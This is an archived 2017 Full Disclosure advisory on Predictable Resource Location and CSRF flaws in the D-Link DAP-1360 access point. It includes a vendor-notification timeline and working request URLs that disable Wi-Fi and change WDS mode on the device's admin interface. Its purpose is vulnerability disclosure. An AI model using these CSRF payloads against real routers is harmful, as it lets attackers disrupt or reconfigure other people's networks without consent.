[<prev] [next>] [day] [month] [year] [list]
Message-ID: <00aa01d2c129$4a0a61e0$0100a8c0@pc>
Date: Sat, 29 Apr 2017 23:43:07 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] PRL and CSRF vulnerabilities in D-Link DAP-1360
Hello list!
After previous Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities, here are new ones. There are Predictable Resource Location
and Cross-Site Request Forgery vulnerabilities in D-Link DAP-1360 (Wi-Fi
Access Point and Router).
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
D-Link should fix these CSRF vulnerabilities in the next version of
firmware, as they answered me in October 2014.
I tested model DAP-1360/B/D1B. There are three models of DAP-1360:
DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link should possibly fix the
vulnerabilities in new firmware.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware possibly
includes fixes for the vulnerabilities.
----------
Details:
----------
Predictable Resource Location (WASC-34):
When D-Link DAP-1360 is used as a router, then it's possible to access to
admin panel via address http://dlink.ap. This address is used in different
D-Link devices with router functionality. It's simplify CSRF and XSS
attacks - all vulnerabilities, which I wrote about in previous advisories.
Because changing IP will not help and it's possible to remotely conduct CSRF
attacks by using domain name.
CSRF (WASC-09):
This PRL vulnerability can be used as with all previous CSRF
vulnerabilities, as with new ones, mentioned bellow. And changing IP from
default 192.168.0.50 to another will not help.
For example you can turn off Wi-Fi:
http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
CSRF (WASC-09):
In section Wi-Fi - WDS it's possible to change parameter WDS Mode:
Turn off - Disable:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}
Turn on - Bridge mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}
Turn on - Repeater mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}
------------
Timeline:
------------
2014.05.22 - informed developers about vulnerabilities in D-Link DAP-1360.
2014-2017 - informed developers about multiple vulnerabilities in this and
other D-Link devices.
2017.03.03 - disclosed at my site (http://websecurity.com.ua/8525/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists